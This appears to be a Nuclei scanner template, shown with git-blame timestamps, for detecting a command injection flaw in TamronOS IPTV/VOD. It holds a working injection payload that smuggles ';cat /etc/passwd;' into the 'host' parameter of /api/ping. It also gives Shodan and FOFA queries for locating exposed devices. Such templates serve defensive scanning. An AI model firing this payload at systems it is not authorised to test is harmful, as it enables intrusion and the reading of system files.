2021-06-17 01:31:59 +00:00
|
|
|
id: tamronos-rce
|
|
|
|
|
|
|
|
info:
|
2022-05-13 20:52:51 +00:00
|
|
|
name: TamronOS IPTV/VOD - Remote Command Execution
|
2021-06-17 01:31:59 +00:00
|
|
|
author: pikpikcu
|
|
|
|
severity: critical
|
2022-05-16 17:54:13 +00:00
|
|
|
description: |
|
|
|
|
TamronOS IPTV/VOD contains a remote command execution in the 'host' parameter of the /api/ping endpoint.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://twitter.com/sec715/status/1405336456923471874
|
2022-05-16 18:04:07 +00:00
|
|
|
classification:
|
2022-05-13 20:52:51 +00:00
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
|
|
cvss-score: 10.0
|
|
|
|
cwe-id: CWE-78
|
2022-05-12 14:18:36 +00:00
|
|
|
metadata:
|
|
|
|
verified: true
|
|
|
|
shodan-query: title:"TamronOS IPTV系统"
|
|
|
|
fofa-query: title="TamronOS IPTV系统"
|
2022-05-16 20:14:51 +00:00
|
|
|
tags: tamronos,rce
|
2021-06-17 01:31:59 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2021-06-17 01:34:49 +00:00
|
|
|
- "{{BaseURL}}/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp"
|
2021-06-17 01:31:59 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2021-06-17 01:31:59 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-05-13 20:52:51 +00:00
|
|
|
|
|
|
|
# Enhanced by cs on 2022/05/13
|